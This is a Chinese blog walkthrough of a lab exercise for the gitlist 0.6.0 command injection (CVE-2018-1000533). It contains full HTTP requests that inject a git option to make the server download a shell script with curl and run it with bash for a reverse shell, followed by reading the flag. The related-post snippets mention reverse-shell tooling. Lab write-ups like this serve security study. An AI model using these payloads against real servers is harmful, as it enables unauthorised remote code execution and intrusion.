[春秋云镜]CVE-2018-1000533

已于 2022-12-03 21:20:21 修改
阅读量5.6k 收藏 3
点赞数
分类专栏: 春秋云镜 靶场 文章标签: 安全
于 2022-12-01 23:23:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128140584
版权

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!

靶场介绍

gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞

春秋云镜开启靶场:
http://eci-2zebxdyfuuxflbl5ayaz.cloudeci1.ichunqiu.com/

先使用python起一个web服务

目录下写反弹shell的命令

 发送以下数据包

POST /example/tree/a/search HTTP/1.1
Host: eci-2zebxdyfuuxflbl5ayaz.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 86

query=--open-files-in-pager=curl http://127.0.0.1:8888/shell.txt -o /tmp/shell.sh;

服务器成功接收到

 反弹shell 数据包

POST /example/tree/a/search HTTP/1.1
Host: eci-2zebxdyfuuxflbl5ayaz.cloudeci1.ichunqiu.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 52

query=--open-files-in-pager=/bin/bash /tmp/shell.sh;

 服务器成功收到shell

读取flag  cat ../../../../../../flag

春天11-
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2018-2893:可以直接反弹shell
04-28
CVE-2018-2893 可以直接反弹shell Usage 监听 nc -lvvp reverse_port 发送payload python weblogic.py target_host target_port reverse_host reverse_port Reffer 说明 仅用于测试和交流学习,勿作他用
春秋云镜CVE-2018-1000533
2301_78321656的博客
07-15 1990
gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。可以用蚁剑连接一句话木马执行其他操作,这里要获取flag,所以直接执行命令获取flag。春秋云镜中的漏洞靶标,CVE编号为CVE-2018-1000533。根据cve并用burpsuite抓取数据包,并放到重放器中。修改数据包,写入一句话木马到网站目录中。访问漏洞环境,寻找可利用的点。
gitlist 0.6.0 远程命令执行漏洞(CVE-2018-1000533
EC_Carrot的博客
06-07 1070
漏洞原理 漏洞原理详细请看:https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 漏洞复现 发送以下数据包,即可执行命令: POST /example/tree/a/search HTTP/1.1 Host: your-ip:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64
春秋云镜 CVE-2018-1000533
qq_22002773的博客
09-06 186
春秋云镜 CVE-2018-1000533
vulhub漏洞复现-Gitlist 0.6.0(cve-2018-1000533)远程命令执行漏洞
遇事不决冲冲冲
10-20 5260
Gitlist gitlist是一款使用PHP开发的图形化git仓库查看工具。 思路 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($query, $branch) { if (empty($query)) { return null; } $query = escapeshellarg($query); try { $results = $this-&
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
gitlist:优雅而现代的git仓库查看器
02-04
GitList:优雅的git仓库查看器 GitList是一个优雅而现代的Web界面,用于与多个git存储库进行交互。 它使您可以使用自己喜欢的浏览器浏览存储库,查看不同修订版本下的文件,提交历史记录,差异。 它还为每个存储库生成RSS feed,使您可以随时随地保持最新变化。 GitList是用PHP编写的,位于微框架之上,并由Twig模板引擎提供支持。 这意味着GitList易于安装且易于定制。 另外,由于 ,GitList华丽的界面成为可能。 产品特点 多仓库支持 多分支支持 多标签支持 提交历史,怪,差异 RSS订阅 语法高亮 仓库统计 屏幕截图 要求 为了在服务器上运行GitList
vulhub漏洞复现二十_GitList
weixin_44193247的博客
01-30 1004
vulhub漏洞复现练习篇
phpipam开源IP地址管理系统Cookie XSS漏洞分析(CVE-2018-1000860)
afei001
02-20 717
phpipam开源IP地址管理系统Cookie XSS漏洞分析(CVE-2018-1000860)
使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
热门推荐
还没想好昵称的新建p的博客
02-22 1万+
本文大致讲述了如何使用 Metasploit 利用 OpenSSH 用户枚举漏洞。请务必遵守相关法律。(CC-BY-ND 4.0)
18年远程cve漏洞及利用对应exp
weixin_42373409的博客
09-14 861
CVE-2018-2628 Oracle Weblogic Server Deserialization RCE CVE-2018-2628 https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize CVE-2018-10933 libSSH Auth Bypass Exploit CVE-2018-10933 https://paper.seebug.org/720/https://github.com/.
cve-2018-3191简析
一个安全研究员
05-27 1864
如题
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 3023
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
CVE-2018-10933 身份验证绕过漏洞验证
玄道的网安博客
10-28 6890
0x00 事件背景 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可...
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4106
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值